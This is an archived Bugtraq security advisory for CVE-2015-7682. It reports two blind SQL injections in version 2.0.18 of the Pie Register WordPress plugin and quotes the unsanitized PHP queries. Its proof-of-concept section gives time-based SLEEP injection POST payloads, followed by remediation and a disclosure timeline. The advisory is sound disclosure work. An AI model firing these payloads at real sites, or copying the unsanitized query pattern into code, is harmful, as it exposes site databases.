lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <201510121844.t9CIikiw018328@sf01web3.securityfocus.com> Date: Mon, 12 Oct 2015 18:44:46 GMT From: grajalerts@...il.com To: bugtraq@...urityfocus.com Subject: CVE-2015-7682: Multiple Blind SQL Injections in Pie Register WordPress Plugin Details ================ Software: Pie Register Version: 2.0.18 Homepage: https://github.com/GTSolutions/Pie-Register CVE: CVE-2015-7682 (Pending) CVSS: 3.5 (Low; AV:N/AC:M/Au:S/C:P/I:N/A:N) CWE: CWE-89 Description ================ Two blind SQL injection vulnerabilities in Pie Register 2.0.18 allow SQL injection by admins leading to loss of database confidentiality. Pie Register is a WordPress plugin with over 10,000 active installs. Vulnerabilities ================ The vulnerabilities are due to the unsanitized POST parameters invitaion_code_bulk_option and invi_del_id: Injection 1: >From pie-register/pie-register.php: 576: $this->delete_invitation_codes($_POST['select_invitaion_code_bulk_option']); . . . 3521: $sql = "DELETE FROM `$codetable` WHERE `id` IN ( ".$ids." )"; Injection 2: >From pie-register/pie-register.php: 1941: if($wpdb->query("DELETE FROM ".$codetable." WHERE id = ".$_POST['invi_del_id'])) Proof of concept ================ URL: http://localhost/wordpress/wp-admin/admin.php?page=pie-invitation-codes Injection 1: POST data: select_invitaion_code_bulk_option=1)%20OR%20SLEEP(15)%3d0%20LIMIT%201--&invitaion_code_bulk_option=delete&btn_submit_invitaion_code_bulk_option=Apply Injection 2: POST data: piereg_invitation_nonce=66e7e6383d&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dpie-invitation-codes&invi_del_id=1%20OR%20SLEEP(15)%3d0%20LIMIT%201-- Remediation ================ Upgrade the plugin to version 2.0.19 or higher. Timeline ================ 2015-09-23: Discovered 2015-09-24: Contacted vendor via website support form 2015-09-28: Vendor supplied security contact email 2015-09-28: Requested CVE 2015-09-30: Report sent to vendor and wordpress.org 2015-10-02: Vendor releases version 2.0.19 on Github - confirmed fixed 2015-10-12: Public Disclosure References ================ [1] http://codex.wordpress.org/Class_Reference/wpdb#Protect_Queries_Against_SQL_Injection_Attacks Discovered by ================ David Moore @grajagandev
Powered by blists - more mailing lists